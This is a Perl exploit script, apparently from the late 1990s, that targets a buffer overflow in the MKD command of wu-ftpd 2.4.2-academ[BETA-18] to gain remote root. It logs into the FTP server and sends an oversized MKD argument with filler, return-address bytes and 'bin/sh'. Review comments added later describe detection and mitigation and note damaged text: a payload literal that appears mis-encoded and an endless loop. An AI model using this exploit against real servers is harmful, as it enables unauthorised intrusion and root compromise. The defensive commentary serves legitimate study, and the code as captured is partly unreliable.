#!/usr/bin/perl
# ABOUT:
# wu-ftpd.pl v1 by ben-z !! wu-2.4.2-academ[BETA-18](1) remote overflow.
# exploits a flaw in the MKD function of wu-ftpd to remotely compromise
# a system and obtain root access. below is a list of affected systems.
#
# System      | Description          | Vulnerable
# --------------------------------------------------------------------
# Redhat 5.2  | installed by default | yes
# Caldera 1.3 | installed by default | yes
# *bsd        | usually installed    | yes
# --------------------------------------------------------------------
#
# THANKS:
# #fts(2), #bitchx, #slackware, #violators @ undernet.org
# #underground and #slackware @ irc.psychic.com
# everyone on irc.slacknet.org, metalman, eklipz, axion, madli0n,
# chawp, aj, magicfx, rhodie, dpad, fenix, and folk.
#
# ANTI-THANKS:
# bXlogic your lame and everyone hates you. stop ripping my code
#
# REVIEW NOTES (defensive reading of this listing):
# - What it is: a proof-of-concept client that, per the header above,
#   targets an overflow in MKD handling in wu-2.4.2-academ[BETA-18]. The
#   affected-systems table is the author's claim; nothing in the code
#   checks the server banner or version.
# - On the wire: one TCP session to port 21 carrying USER, PASS, CWD, then
#   an MKD whose argument is $length filler characters (256 unless
#   overridden) followed by a short byte string, sent twice, then MKD bin
#   and CWD bin. No server reply is read between the commands.
# - Detection: an MKD argument hundreds of bytes long, or one containing
#   high-bit bytes, is abnormal for FTP and can be matched in
#   control-channel logs or by a network sensor; so can a burst of
#   commands issued without waiting for replies.
# - Mitigation: the usage text says the login needs a directory it can
#   write to, so removing anonymous write access takes away that
#   precondition. The "(patched)" message below implies fixed server
#   builds exist; running one addresses the flaw itself.
# - Fidelity: this copy was flattened onto two lines and some text looks
#   damaged in extraction (see the NOTE(review) comments). Nothing has
#   been repaired here; only line breaks and comments were added.
# - The script runs without "use strict" or "use warnings".

# Banner.
print "===================================================================\n";
print "= : brought to you by ben-z and #fts(2)\@undernet.org =\n";
print "===================================================================\n\n";

# Default number of filler characters placed in the MKD argument.
$length=256;

# Array in scalar context: number of command-line arguments.
$ARGC=@ARGV;

# Print usage and stop when fewer than three arguments are supplied.
# NOTE(review): the positional-argument placeholders appear to be missing
# from the Syntax line as captured; the text is left exactly as found.
if ($ARGC <3) {
print ": Syntax: $0 [offset(256)]\n";
print "-- Host: address of wu-ftpd server to own --\n";
print "-- Directory: the full path of a directory has write access to\n";
print "-- Login: ftp login name (Anonymous if you dont have an account) --\n";
print "-- Password: ftp password (if Anonymous, use an email address)\n";
print "-- Offset: length of string to use (the default should work)\n";
exit;
}

use Socket;

# Only these six names are lexical; $line is declared but never used, and
# every other variable in the script is a package global.
my($remote,$port,$iaddr,$paddr,$proto,$line);

# Positional arguments: host, writable directory, login, password.
$remote=$ARGV[0];
$port = "21";    # FTP control port, hard-coded
$rdir=$ARGV[1];
$rlogin=$ARGV[2];
$rpass=$ARGV[3];

# Optional fifth argument replaces the default filler length. It is used
# as given, with no numeric or range validation.
if ($ARGV[4]) { $length=$ARGV[4]; }

# Filler: $length copies of "?".
$string="?" x $length;

print ": Attempting overflow on $remote [offset: $length]\n";

# Resolve the target and open a plain TCP connection on the bareword
# handle SOCK; any failure aborts with the system error text.
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";;

# Log in and change into the caller-supplied directory. Commands end in a
# bare "\n" and are sent back to back; server replies are never read, so
# a rejected login is not noticed by the script.
$msg = "USER $rlogin\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "PASS $rpass\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "CWD $rdir\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";

# Oversized MKD: the filler string followed by a short byte sequence and
# the text "bin/sh".
# NOTE(review): the non-ASCII characters in this literal look mis-encoded
# in this capture; the literal is reproduced unchanged, not reconstructed.
$msg = "MKD $string\Hüÿ¿Hüÿ¿bin/sh\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
# The same command is sent a second time; a send failure here is what the
# script reports as "(patched)" - presumably on the assumption that a
# fixed server has already closed the connection.
send(SOCK, $msg, 0) or die "Server Error! (patched): $!";

# Follow-up directory commands.
$msg = "MKD bin\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
$msg = "CWD bin\n";
send(SOCK, $msg, 0) or die "Unable to send packet: $!";
# This message is assigned but never sent in the code as captured.
$msg = "MKD sh\n";

# NOTE(review): as captured the loop has an empty condition, which Perl
# treats as always true, so the body prints $_ repeatedly and the closing
# message and exit below are not reached. Left exactly as found.
while () {
print;
}
print ": done. please visit http://www.slacknet.org\n";
exit;